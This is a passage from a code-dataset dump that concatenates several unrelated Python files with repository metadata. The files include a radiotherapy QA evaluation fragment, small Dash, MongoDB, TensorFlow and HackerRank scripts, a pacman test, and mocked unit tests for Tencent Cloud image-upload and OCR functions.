"gantry" : field[0].infos["gantry"],
"collimator" : field[0].infos["collimator"],
"basedose": baseDose,
"fielddose": fieldDose,
"diff": (fieldDose-baseDose) / baseDose * 100
} )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
# progress hier immer 2 Felder
self.fileCount += 2
#print( md["variante"], filesMax, self.fileCount, 50 + ( 50 / filesMax * self.fileCount ) )
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# Gruppiert nach Gantry und Kollimator auswerten
( df_group
.query( "CollMode == 'AsymmetryX'" )
.groupby( [ 'gantry', 'collimator' ] )
.apply( joinImages )
)
# das Ergebnis verarbeiten
df = pd.DataFrame( data )
#
# Abweichung ausrechnen und Passed setzen
#
check = [
{ "field": 'diff', 'tolerance':'default' }
]
acceptance = self.check_acceptance( df, md, check )
#
# Ergebnis in result merken
#
result.append( self.createResult( df, md, check,
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
#
# result Tabelle erzeugen
#
self.pdf.pandas( df,
attrs={"class":"layout-fill-width", "margin-top": "5mm"}
, fields=md["table_fields"]
)
# toleranz anzeigen
text_values = {
"f_warning": md.current.tolerance.default.warning.get("f",""),
"f_error": md.current.tolerance.default.error.get("f","")
}
text = """<br>
Warnung bei: <b style="position:absolute;left:25mm;">{f_warning}</b><br>
Fehler bei: <b style="position:absolute;left:25mm;">{f_error}</b>
""".format( **text_values ).replace("{value}", "Diff")
self.pdf.text( text )
# Gesamt check - das schlechteste aus der tabelle
self.pdf.resultIcon( acceptance )
#
# Gruppiert nach Tag und SeriesNumber abarbeiten
#
( fileData
.sort_values(by=[ "gantry", "collimator", "CollMode", "AcquisitionDateTime"])
.groupby( [ 'day', 'SeriesNumber' ] )
.apply( groupBySeries )
)
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
| 37.146108 | 209 | 0.500709 |
2e81440dd46d0cd50a514576859b4698c9217588
| 431 |
py
|
Python
|
examples/simple_slider.py
|
xinetzone/dash-tests
|
cd4526caa2f9d906915c31370b3487bdcef92aa4
|
[
"Apache-2.0"
] | 1 |
2022-03-01T07:38:32.000Z
|
2022-03-01T07:38:32.000Z
|
examples/simple_slider.py
|
xinetzone/dash-tests
|
cd4526caa2f9d906915c31370b3487bdcef92aa4
|
[
"Apache-2.0"
] | 12 |
2021-07-13T12:33:36.000Z
|
2021-07-14T05:25:19.000Z
|
examples/simple_slider.py
|
xinetzone/dash-book
|
1f624e87e2aa02c9931318918df969e44bdd2c07
|
[
"Apache-2.0"
] | null | null | null |
from dash import dcc, html
from dash.dependencies import Input, Output
from app import app
layout = html.Div([
dcc.Slider(
id='my-slider',
min=0,
max=20,
step=0.5,
value=10,
),
html.Div(id='slider-output-container')
])
@app.callback(
Output('slider-output-container', 'children'),
[Input('my-slider', 'value')])
def update_output(value):
return f'你选择了 "{value}"'
| 18.73913 | 50 | 0.600928 |
d84a679d8e874a13fb60c7fa45f4303f7f11d004
| 2,012 |
py
|
Python
|
getarq.py
|
neviim/gt6db
|
f30d741f7722c4a086fbeaaf1995eeb61d63612e
|
[
"MIT"
] | null | null | null |
getarq.py
|
neviim/gt6db
|
f30d741f7722c4a086fbeaaf1995eeb61d63612e
|
[
"MIT"
] | null | null | null |
getarq.py
|
neviim/gt6db
|
f30d741f7722c4a086fbeaaf1995eeb61d63612e
|
[
"MIT"
] | null | null | null |
#!/usr/bin env python3
import os
import csv
import json
import pymongo
from pymongo import MongoClient
# mongodb
def get_db():
client = MongoClient('localhost:27017')
db = client.gt6db
return db
def add_dados(db, data):
db.countries.insert(data)
def get_country(db):
return db.countries.find_one()
# ---
def readMyFiles(filePath):
# abre banco gt6db
db = get_db()
#get all files in the given folder
fileListing = os.listdir(filePath)
for myFile in fileListing:
#create the file path
myFilePath = os.path.join(filePath, myFile)
#check to make sure its a file not a sub folder
if (os.path.isfile(myFilePath) and myFilePath.endswith(".csv")):
# gera arquivo csv
# with open(myFilePath, 'r', encoding='utf-8') as csvfile:
# #sniff to find the format
# fileDialect = csv.Sniffer().sniff(csvfile.read(1024))
# csvfile.seek(0)
# #create a CSV reader
# myReader = csv.reader(csvfile, dialect=fileDialect)
# #read each row
# for row in myReader:
# #do your processing here
# #print(row)
# pass
dados = {}
# gera arquivo json
with open(myFilePath, 'r', encoding='utf-8') as csvfile:
#sniff para encontrar o formato format
fileDialect = csv.Sniffer().sniff(csvfile.read(1024))
csvfile.seek(0)
#read the CSV file into a dictionary
dictReader = csv.DictReader(csvfile, dialect=fileDialect)
for row in dictReader:
#print(row)
db.base.insert(row)
return
if __name__ == '__main__':
currentPath = os.path.dirname(__file__)
filePath = os.path.abspath(os.path.join(currentPath, os.pardir,os.pardir,'_github/gt6/csv'))
readMyFiles(filePath)
| 28.338028 | 96 | 0.567097 |
d8e1a1fa2188a997b036d4bbc5e9a957ed8233a4
| 860 |
py
|
Python
|
graph_network/util/debug_logger.py
|
stevezheng23/graph_network_tf
|
b48a43453c2731f253bfe5a61e0b6339f4fc9f99
|
[
"Apache-2.0"
] | 39 |
2019-02-23T07:55:43.000Z
|
2021-05-25T12:39:54.000Z
|
graph_network/util/debug_logger.py
|
stevezheng23/graph_network_tf
|
b48a43453c2731f253bfe5a61e0b6339f4fc9f99
|
[
"Apache-2.0"
] | 3 |
2019-07-29T08:11:25.000Z
|
2021-03-23T05:22:29.000Z
|
graph_network/util/debug_logger.py
|
stevezheng23/graph_network_tf
|
b48a43453c2731f253bfe5a61e0b6339f4fc9f99
|
[
"Apache-2.0"
] | 7 |
2019-03-17T02:30:45.000Z
|
2020-03-03T22:11:06.000Z
|
import codecs
import os.path
import time
import numpy as np
import tensorflow as tf
__all__ = ["DebugLogger"]
class DebugLogger(object):
"""debug logger"""
def __init__(self,
output_dir):
"""initialize debug logger"""
if not tf.gfile.Exists(output_dir):
tf.gfile.MakeDirs(output_dir)
self.log_file = os.path.join(output_dir, "debug_{0}.log".format(time.time()))
self.log_writer = codecs.getwriter("utf-8")(tf.gfile.GFile(self.log_file, mode="a"))
def log_print(self,
message):
"""log and print debugging message"""
time_stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
log_line = "{0}: {1}".format(time_stamp, message).encode('utf-8')
self.log_writer.write("{0}\r\n".format(log_line))
print(log_line)
| 31.851852 | 92 | 0.601163 |
9917ac0d082d36b23fe420d60e5928b9a417ba5f
| 607 |
py
|
Python
|
Algorithms/Implementation/Strange_Counter.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/Strange_Counter.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/Strange_Counter.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
# https://www.hackerrank.com/challenges/strange-code/problem?utm_campaign=challenge-recommendation&utm_medium=email&utm_source=24-hour-campaign
starting = 3
index = 1
# time and value seperated by 2 min
time,value = [],[]
for i in range(1,40+1):
time.append(index) # time
value.append(starting) # value
index = starting+index
starting *= 2
cycle = list(zip(time,value))
# time
t = 213921847123
# value to find in time
f = 0
for i in range(len(time)):
if ((t<time[i]) is True) and ((t>time[i]) is False):
f = (i-1,time[i-1])
break
a = abs(f[1]-t)
print(value[f[0]]-a)
| 23.346154 | 143 | 0.655684 |
510562c861d3b8be08b435039d847a01d0c6f9e9
| 504 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade060.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade060.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade060.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Try to upgrade two packages which would break deps"
lp1 = pmpkg("pkg1")
lp1.depends = ["pkg2=1.0"]
self.addpkg2db("local", lp1)
lp2 = pmpkg("pkg2", "1.0-1")
self.addpkg2db("local", lp2)
p1 = pmpkg("pkg1", "1.1-1")
p1.depends = ["pkg2=1.0-1"]
self.addpkg(p1)
p2 = pmpkg("pkg2", "1.1-1")
self.addpkg(p2)
self.args = "-U %s" % " ".join([p.filename() for p in (p1, p2)])
self.addrule("PACMAN_RETCODE=1")
self.addrule("PKG_VERSION=pkg1|1.0-1")
self.addrule("PKG_VERSION=pkg2|1.0-1")
| 22.909091 | 71 | 0.64881 |
5a8d2479547a3e600faddf97ee8eb1ce9ec3ffd9
| 47,904 |
py
|
Python
|
projects/g4h2-graduation-project/src/backends/scf_functions/tests.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g4h2-graduation-project/src/backends/scf_functions/tests.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g4h2-graduation-project/src/backends/scf_functions/tests.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
import base64
import json
import logging
import unittest
from hashlib import md5
from io import BytesIO
from typing import Any, AnyStr, Dict, Tuple
from unittest import mock
from conf import settings
import handler_upload_img_to_cos
import handler_trigger_submit_img_to_ocr
import handler_submit_img_to_ocr
import handler_check_result
logger = logging.getLogger('unittest')
def check_cos_config(
test_case: unittest.TestCase,
mock_cos_config: mock.MagicMock,
call_count: int = -1,
case_id: str = None
):
"""检查 COS 配置是否正确
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
if call_count >= 0:
test_case.assertEqual(call_count, mock_cos_config.call_count, f'{case_id_in_msg}CosConfig 初始化次数与预期不符')
for call_args in mock_cos_config.call_args_list:
test_case.assertEqual(0, len(call_args[0]), f'{case_id_in_msg}CosConfig 初始化时有预期外的位置参数')
test_case.assertEqual(
settings.QCLOUD_SECRET_ID,
call_args[1].get('SecretId'),
f'{case_id_in_msg}CosConfig 初始化时参数 SecretId 不符合预期'
)
test_case.assertEqual(
settings.QCLOUD_SECRET_KEY,
call_args[1].get('SecretKey'),
f'{case_id_in_msg}CosConfig 初始化时参数 SecretKey 不符合预期'
)
test_case.assertEqual(
settings.QCLOUD_REGION,
call_args[1].get('Region'),
f'{case_id_in_msg}CosConfig 初始化时参数 Region 不符合预期'
)
test_case.assertEqual(
'https',
call_args[1].get('Scheme'),
f'{case_id_in_msg}CosConfig 初始化时参数 Scheme 不符合预期'
)
test_case.assertEqual(4, len(call_args[1]), '{case_id_in_msg}CosConfig 初始化时有不符合预期数量的关键字参数')
def check_cos_client(
test_case: unittest.TestCase,
mock_cos_client: mock.MagicMock,
call_count: int = -1,
case_id: str = None
):
"""检查 COS 客户端是否配置正确
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
if call_count >= 0:
test_case.assertEqual(call_count, mock_cos_client.call_count, f'{case_id_in_msg}CosS3Client 初始化次数与预期不符')
for call_args in mock_cos_client.call_args_list:
test_case.assertEqual(1, len(call_args[0]), f'{case_id_in_msg}CosS3Client 初始化时有不符合预期数量的位置参数')
test_case.assertEqual(0, len(call_args[1]), f'{case_id_in_msg}CosS3Client 初始化时有预期之外的关键字参数')
test_case.assertEqual('config', call_args[0][0], f'{case_id_in_msg}CosS3Client 初始化时参数与预期不符')
class TestUploadImgToCos(unittest.TestCase):
@staticmethod
def open_img(path: str) -> Tuple[Dict[str, AnyStr], str]:
"""打开图像
"""
img_suffix = path.split('.')[-1] if len(path.split('.')) != 0 else None
if img_suffix in ('jpg', 'jpeg', 'JPG', 'JPEG'):
img_type = 'image/jpeg'
elif img_suffix in ('png', 'PNG'):
img_type = 'image/png'
else:
img_type = 'application/octet-stream'
with open(path, 'rb') as fp:
img = fp.read()
img_md5 = md5(img).hexdigest()
return {
'type': img_type,
'image': base64.b64encode(img).decode()
}, img_md5
def generate_test_event(self, img_path: str) -> Tuple[Dict[str, Any], str]:
"""生成测试用的 API 网关触发事件
"""
opened_img, img_md5 = self.open_img(img_path)
return {
'body': json.dumps(opened_img),
'headers': {'content-type': 'application/json'}
}, img_md5
def check_ret(self, ret, status_code: int = 200, case_id: str = None):
"""检查函数响应
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertIsInstance(ret, dict, f'{case_id_in_msg}主函数响应格式与预期不符')
self.assertEqual(status_code, ret.get('statusCode'), f'{case_id_in_msg}主函数响应状态码与预期不符')
self.assertFalse(ret.get('isBase64Encoded'), f'{case_id_in_msg}主函数响应 isBase64Encoded 字段与预期不符')
if status_code == 200:
self.assertEqual(
'application/json',
ret.get('headers', {}).get('Content-Type'),
f'{case_id_in_msg}主函数响应 Content-Type 与预期不符'
)
ret_body = json.loads(ret.get('body'))
img_id = ret_body.get('id')
self.assertRegex(
img_id,
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
f'{case_id_in_msg}主函数响应图片 id 与预期不符'
)
result_url = ret_body.get('result')
self.assertEqual(
settings.RESULT_URL_FORMATTER.format(f_id=img_id[0], id=img_id),
result_url,
f'{case_id_in_msg}主函数响应图片 result 与预期不符'
)
img_direct_url = ret_body.get('img_direct_url')
self.assertEqual(
settings.IMG_DIRECT_URL_FORMATTER.format(f_id=img_id[0], id=img_id),
img_direct_url,
f'{case_id_in_msg}主函数响应图片 img_direct_url 与预期不符'
)
result_direct_url = ret_body.get('result_direct_url')
self.assertEqual(
settings.RESULT_DIRECT_URL_FORMATTER.format(f_id=img_id[0], id=img_id),
result_direct_url,
f'{case_id_in_msg}主函数响应图片 result_direct_url 与预期不符'
)
def check_cos_put_object(
self, client: mock.MagicMock,
img_id: str,
img_content_type: str,
img_md5: str,
case_id: str = None
):
"""检查 COS 对象是否按正确方式上传
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
settings.COS_BUCKET,
client.put_object.call_args[1].get('Bucket'),
f'{case_id_in_msg}上传 COS 时 Bucket 参数与预期不符'
)
self.assertEqual(
f'{settings.IMAGES_ROOT}/{img_id}',
client.put_object.call_args[1].get('Key'),
f'{case_id_in_msg}上传 COS 时 Key 参数与预期不符'
)
self.assertEqual(
img_content_type,
client.put_object.call_args[1].get('ContentType'),
f'{case_id_in_msg}上传 COS 时 ContentType 参数与预期不符'
)
self.assertEqual(
img_md5,
md5(client.put_object.call_args[1].get('Body')).hexdigest(),
f'{case_id_in_msg}上传 COS 时 Body 参数与预期不符'
)
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_main_process(self, mock_cos_client, mock_cos_config):
"""测试主流程
测试用例:
1.1 test_data/test-img-normal-1.jpg 普通 JPEG 图片
1.2 test_data/test-img-normal-2.png 普通 PNG 图片
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
# 测试 JPEG 图片
event, img_md5 = self.generate_test_event('test_data/test-img-normal-1.jpg')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 200, '1.1')
img_id = json.loads(ret.get('body')).get('id')
self.check_cos_put_object(client, img_id, 'image/jpeg', img_md5, '1.1')
# 测试 PNG 图片
event, img_md5 = self.generate_test_event('test_data/test-img-normal-2.png')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 200, '1.2')
img_id = json.loads(ret.get('body')).get('id')
self.check_cos_put_object(client, img_id, 'image/png', img_md5, '1.2')
check_cos_config(self, mock_cos_config, 2, '1.x')
check_cos_client(self, mock_cos_client, 2, '1.x')
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_img_too_big(self, mock_cos_client, mock_cos_config):
"""测试图片过大的情况
测试用例:
1.3 test_data/test-img-too-big-1.png 过大图片
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
event, img_md5 = self.generate_test_event('test_data/test-img-too-big-1.png')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 413, '1.3')
self.assertFalse(client.put_object.called, '[case 1.3] 向 COS 发送了过大的图片')
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_bad_request(self, mock_cos_client, mock_cos_config):
"""测试格式不合法的请求
测试用例: 1.4 - 1.10
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
test_cases = [
('1.4', {}),
('1.5', {'body': '{}', 'headers': {}}),
('1.6', {'body': '{}', 'headers': {'content-type': 'application/xml'}}),
(
'1.7',
{'body': '{}', 'headers': {'content-type': 'application/json'}}
),
(
'1.8',
{'body': '{"type": "image/jpeg", "image": [1, 2]}', 'headers': {'content-type': 'application/json'}}
),
(
'1.9',
{'body': '{"type": "image/gif", "image": "test"}', 'headers': {'content-type': 'application/json'}}
),
(
'1.10',
{'body': '{"type": "image/jpeg", "image": "testa=="}', 'headers': {'content-type': 'application/json'}}
),
]
for i, case in test_cases:
ret = handler_upload_img_to_cos.main_handler(case, None)
self.check_ret(ret, 400, i)
self.assertFalse(client.put_object.called, f'[case {i}] 非法请求触发了向 COS 的发送')
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_cos_exception(self, mock_cos_client, mock_cos_config):
"""测试 COS 异常情况
测试用例:
1.11 上传时抛出 CosServiceError
1.12 上传时抛出 CosClientError
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
event, _ = self.generate_test_event('test_data/test-img-normal-1.jpg')
client.put_object.side_effect = handler_upload_img_to_cos.CosServiceError('PUT', 'message', 'status_code')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 500, '1.11')
client.put_object.side_effect = handler_upload_img_to_cos.CosClientError('message')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 500, '1.12')
class TestTriggerSubmitImgToOcr(unittest.TestCase):
@staticmethod
def generate_test_event(img_path: str, content_type: str):
"""生成用于触发函数的事件
"""
bucket_cli_name = settings.COS_BUCKET[:-len(settings.QCLOUD_APP_ID) - 1]
return {
'Records': [{
'cos': {
'cosBucket': {
'name': bucket_cli_name,
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'/{settings.QCLOUD_APP_ID}/{bucket_cli_name}/{img_path}',
'meta': {
'Content-Type': content_type
}
}
}
}]
}
def check_ret(self, ret: Any, key: str, case_id: str = None):
"""检查函数返回结果
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertIsInstance(ret, list, f'{case_id_in_msg}函数返回结果类型不符合预期')
self.assertEqual(1, len(ret), f'{case_id_in_msg}函数返回结果条数不符合预期')
self.assertIsInstance(ret[0], dict, f'{case_id_in_msg}函数返回结果子条目类型不符合预期')
self.assertEqual(key, ret[0].get('key'), f'{case_id_in_msg}函数返回结果 key 字段不符合预期')
self.assertEqual(key.split('/')[-1], ret[0].get('filename'), f'{case_id_in_msg}函数返回结果 filename 字段不符合预期')
self.assertEqual(2, len(ret[0]), f'{case_id_in_msg}函数返回结果子条目键数目不符合预期')
def check_scf_call(self, client: mock.MagicMock, key: str, case_id: str = None):
"""检查是否正确使用 SCF 的 call 方法
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
2,
len(client.call.call_args[0]),
f'{case_id_in_msg}调用 SCF 的 call 方法时位置参数的数目不符合预期'
)
self.assertEqual(
'Invoke',
client.call.call_args[0][0],
f'{case_id_in_msg}调用 SCF 的 call 方法时第 1 个位置参数的值不符合预期'
)
image = {
'key': key,
'filename': key.split('/')[-1]
}
self.assertEqual(
{
'Namespace': settings.SUBMIT_IMG_TO_OCR_FUNC_NAMESPACE,
'FunctionName': settings.SUBMIT_IMG_TO_OCR_FUNC_NAME_FORMATTER.format(f_id=key.split('/')[-1][0]),
'InvocationType': 'Event',
'ClientContext': json.dumps(image)
},
client.call.call_args[0][1],
f'{case_id_in_msg}调用 SCF 的 call 方法时第 2 个位置参数的值不符合预期'
)
self.assertEqual(
0,
len(client.call.call_args[1]),
f'{case_id_in_msg}调用 SCF 的 call 方法时有多余的关键字参数'
)
@mock.patch('handler_trigger_submit_img_to_ocr.credential')
@mock.patch('handler_trigger_submit_img_to_ocr.scf_client')
def test_main_process(self, mock_scf_client: mock.MagicMock, mock_credential: mock.MagicMock):
"""测试主过程
测试用例: 4.1.1
"""
mock_credential.Credential.return_value = 'cred'
scf_client = mock_scf_client.ScfClient.return_value
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key, 'image/jpeg')
ret = handler_trigger_submit_img_to_ocr.main_handler(event, None)
self.check_ret(ret, key, '4.1.1')
self.check_scf_call(scf_client, key, '4.1.1')
@mock.patch('handler_trigger_submit_img_to_ocr.credential')
@mock.patch('handler_trigger_submit_img_to_ocr.scf_client')
def test_bad_request(self, mock_scf_client: mock.MagicMock, mock_credential: mock.MagicMock):
"""测试非法入参
测试用例: 4.2.1 - 4.2.5
"""
mock_credential.Credential.return_value = 'cred'
scf_client = mock_scf_client.ScfClient.return_value
test_cases = [
('4.2.1', {}),
('4.2.2', {'Records': [{}, ]}),
('4.2.3', {
'Records': [{
'cos': {
'cosBucket': {
'name': 'bucket',
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'/{settings.QCLOUD_APP_ID}/bucket/img_path',
'meta': {
'Content-Type': 'image/jpeg'
}
}
}
}, ]
}),
('4.2.4', {
'Records': [{
'cos': {
'cosBucket': {
'name': settings.COS_BUCKET.split('-')[0],
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'/{settings.QCLOUD_APP_ID}/{settings.COS_BUCKET.split("-")[0]}/img_path',
'meta': {
'Content-Type': 'image/gif'
}
}
}
}, ]
}),
('4.2.5', {
'Records': [{
'cos': {
'cosBucket': {
'name': settings.COS_BUCKET.split('-')[0],
'appid': settings.QCLOUD_APP_ID,
},
'cosObject': {
'key': f'img_path',
'meta': {
'Content-Type': 'image/jpeg'
}
}
}
}, ]
}),
]
for i, test_case in test_cases:
ret = handler_trigger_submit_img_to_ocr.main_handler(test_case, None)
self.assertEqual([], ret, f'[case {i}] 函数返回内容不符合预期')
self.assertEqual(0, scf_client.call.call_count, f'[case [{i}] SCF 的 call 方法调用次数不符合预期]')
@mock.patch('handler_trigger_submit_img_to_ocr.credential')
@mock.patch('handler_trigger_submit_img_to_ocr.scf_client')
def test_scf_exception(self, mock_scf_client: mock.MagicMock, mock_credential: mock.MagicMock):
"""测试调用 SCF 发生异常的情况
测试用例: 4.3
"""
mock_credential.Credential.return_value = 'cred'
scf_client = mock_scf_client.ScfClient.return_value
scf_client.call.side_effect = handler_trigger_submit_img_to_ocr.TencentCloudSDKException()
key = f'{settings.IMAGES_ROOT}/2a932c76-869c-49d0-8d16-04f480dbdcf7'
event = self.generate_test_event(key, 'image/jpeg')
ret = handler_trigger_submit_img_to_ocr.main_handler(event, None)
self.check_ret(ret, key, '4.3')
class TestSubmitImgToOcr(unittest.TestCase):
@staticmethod
def generate_test_event(key: str):
"""生成用于触发函数的事件
"""
return {
'key': key,
'filename': key.split('/')[-1]
}
@staticmethod
def prepare_mock(
mock_ocr_client: mock.MagicMock,
mock_credential: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock,
mock_settings: mock.MagicMock = None
) -> Tuple[mock.MagicMock, mock.MagicMock]:
"""准备测试所需 mock 的对象
"""
mock_cos_config.return_value = 'config'
cos_client = mock_cos_client.return_value
cos_client.get_presigned_download_url.return_value = 'auth_url'
mock_credential.Credential.return_value = 'cred'
ocr_client = mock_ocr_client.OcrClient.return_value
ocr_client.GeneralBasicOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralFastOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralEfficientOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralAccurateOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.GeneralHandwritingOCR.return_value.to_json_string.return_value = '{"TextDetections": "ocr_result"}'
ocr_client.TextDetect.return_value.to_json_string.return_value = '{"HasText": true}'
if mock_settings:
for attr in dir(settings):
setattr(mock_settings, attr, getattr(settings, attr))
return cos_client, ocr_client
def check_ret(self, ret: Any, key: str, case_id: str = None):
"""检查函数返回结果
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertIsInstance(ret, dict, f'{case_id_in_msg}函数返回结果类型不符合预期')
self.assertIsInstance(ret, dict, f'{case_id_in_msg}函数返回结果子条目类型不符合预期')
self.assertEqual(key, ret.get('key'), f'{case_id_in_msg}函数返回结果 key 字段不符合预期')
self.assertEqual(key.split('/')[-1], ret.get('filename'), f'{case_id_in_msg}函数返回结果 filename 字段不符合预期')
self.assertEqual('auth_url', ret.get('auth_url'), f'{case_id_in_msg}函数返回结果 auth_url 字段不符合预期')
self.assertEqual('ocr_result', ret.get('result'), f'{case_id_in_msg}函数返回结果 result 字段不符合预期')
self.assertEqual(4, len(ret), f'{case_id_in_msg}函数返回结果子条目键数目不符合预期')
def check_cos_get_presigned_download_url(self, client: mock.MagicMock, key: str, case_id: str = None):
"""检查是否正确使用 COS 的 get_presigned_download_url 方法
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
0,
len(client.get_presigned_download_url.call_args[0]),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时含预期外的位置参数'
)
self.assertEqual(
settings.COS_BUCKET,
client.get_presigned_download_url.call_args[1].get('Bucket'),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时 Bucket 参数不符合预期'
)
self.assertEqual(
key,
client.get_presigned_download_url.call_args[1].get('Key'),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时 Key 参数不符合预期'
)
self.assertEqual(
300,
client.get_presigned_download_url.call_args[1].get('Expired'),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时 Expired 参数不符合预期'
)
self.assertEqual(
3,
len(client.get_presigned_download_url.call_args[1]),
f'{case_id_in_msg}调用 COS 的 get_presigned_download_url 方法时关键字参数的数目不符合预期'
)
def check_cos_put_object(self, client: mock.MagicMock, key: str, case_id: str = None):
"""检查是否正确使用 COS 的 put_object 方法
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
0,
len(client.put_object.call_args[0]),
f'{case_id_in_msg}上传 OCR 结果时含预期外的位置参数'
)
self.assertEqual(
settings.COS_BUCKET,
client.put_object.call_args[1].get('Bucket'),
f'{case_id_in_msg}上传 OCR 结果时 Bucket 参数与预期不符'
)
self.assertEqual(
f'{settings.RESULTS_ROOT}/{key.split("/")[-1]}.json',
client.put_object.call_args[1].get('Key'),
f'{case_id_in_msg}上传 OCR 结果时 Key 参数与预期不符'
)
self.assertEqual(
'application/json',
client.put_object.call_args[1].get('ContentType'),
f'{case_id_in_msg}上传 OCR 结果时 ContentType 参数与预期不符'
)
self.assertEqual(
'"ocr_result"',
client.put_object.call_args[1].get('Body'),
f'{case_id_in_msg}上传 OCR 结果时 Body 参数与预期不符'
)
self.assertEqual(
4,
len(client.put_object.call_args[1]),
f'{case_id_in_msg}上传 OCR 结果时关键字参数的数目不符合预期'
)
def check_ocr_submit(self, client: mock.MagicMock, mock_settings: mock.MagicMock, case_id: str = None):
"""检查 OCR 服务是否正确调用
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
if mock_settings.OCR_DETECT_FIRST:
self.assertIsInstance(
client.TextDetect.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.TextDetectRequest,
f'{case_id_in_msg}调用 OCR TextDetect 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.TextDetect.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR TextDetect 方法时参数的 ImageUrl 字段不符合预期'
)
if mock_settings.OCR_TYPE == 'basic':
self.assertIsInstance(
client.GeneralBasicOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralBasicOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralBasicOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
client.GeneralBasicOCR.call_args[0][0].ImageUrl,
f'{case_id_in_msg}调用 OCR GeneralBasicOCR 方法时参数的 ImageUrl 字段不符合预期'
)
self.assertEqual(
settings.GENERAL_BASIC_OCR_LANGUAGE,
client.GeneralBasicOCR.call_args[0][0].LanguageType,
f'{case_id_in_msg}调用 OCR GeneralBasicOCR 方法时参数的 LanguageType 字段不符合预期'
)
elif mock_settings.OCR_TYPE == 'fast':
self.assertIsInstance(
client.GeneralFastOCR.call_args[0][0],
handler_submit_img_to_ocr.ocr_models.GeneralFastOCRRequest,
f'{case_id_in_msg}调用 OCR GeneralFastOCR 方法时参数类型不符合预期'
)
self.assertEqual(
'auth_url',
